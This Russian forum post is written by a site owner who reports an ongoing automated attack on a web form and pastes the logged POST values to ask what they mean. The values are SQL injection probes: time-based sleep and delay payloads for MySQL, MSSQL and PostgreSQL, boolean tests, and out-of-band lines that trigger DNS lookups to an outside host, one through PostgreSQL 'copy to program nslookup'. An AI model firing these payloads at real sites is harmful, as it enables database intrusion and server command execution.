Интернет |
Атака на сайт с передачей через форму разного рода непонятных параметров? Чем это сулит?
Приветствую, уважаемые гуру...
Сегодня на сайт началась атака и уже порядка 7 часов не прекращается...
Посредством обработчика одной из форм идут попытки записать в БД какую-то гадость посредством передачи POST запросом в значениях формы.
Периодически меняется идентификатор формы, в который подставляются данные. Ниже скину по очереди несколько значений которые подряд идут при каждой новой попытке. Подскажите, какая может быть цель у этих иродов исходя из кода, который пытаются передать через форму.
И того - 24 запроса в которых код по очереди как выше (каждая строка - код с последующей заявки) и далее по новой...
Что это за зверь не подскажите?
Сегодня на сайт началась атака и уже порядка 7 часов не прекращается...
Посредством обработчика одной из форм идут попытки записать в БД какую-то гадость посредством передачи POST запросом в значениях формы.
Периодически меняется идентификатор формы, в который подставляются данные. Ниже скину по очереди несколько значений которые подряд идут при каждой новой попытке. Подскажите, какая может быть цель у этих иродов исходя из кода, который пытаются передать через форму.
PHP код:
if(now()=sysdate(),sleep(420),0)/*\'XOR(if(now()=sysdate(),sleep(420),0))OR\'"XOR(if(now()=sysdate(),sleep(420),0))OR"*/
(select(0)from(select(sleep(420)))v)/*\'+(select(0)from(select(sleep(420)))v)+\'"+(select(0)from(select(sleep(420)))v)+"*/
-1; waitfor delay \'0:0:420\' --
-1); waitfor delay \'0:0:420\' --
1 waitfor delay \'0:0:420\' --
aUgtJ1Jh\'; waitfor delay \'0:0:140\' --
-1;select pg_sleep(140); --
-1);select pg_sleep(140); --
-1));select pg_sleep(140); --
NiwVY2Ly\';select pg_sleep(140); --
UCWUfdRh\');select pg_sleep(140); --
Zpn3BjsT\'));select pg_sleep(280); --
1||UTL_INADDR.get_host_address(\'dns.\'||\'sqli.013405.986-17533.986.f76fb.1.bxss\'||\'.me\')
\'||UTL_INADDR.get_host_address(\'dns.\'||\'sqli.013405.986-17534.986.f76fb.1.bxss\'||\'.me\')||\'
1;copy (select \'\') to program \'nslookup dns.sqli.\\013405.986-17535.986.f76fb.\\1.bxss.me\'
1\';copy (select \'\') to program \'nslookup dns.sqli.\\013405.986-17536.986.f76fb.\\1.bxss.me
836\'
1
1
-1 OR 2+306-306-1=0+0+0+1 --
-1 OR 2+46-46-1=0+0+0+1
-1\' OR 2+946-946-1=0+0+0+1 --
-1\' OR 2+246-246-1=0+0+0+1 or \'jM2wJpwt\'=\'
-1" OR 2+826-826-1=0+0+0+1 --
Что это за зверь не подскажите?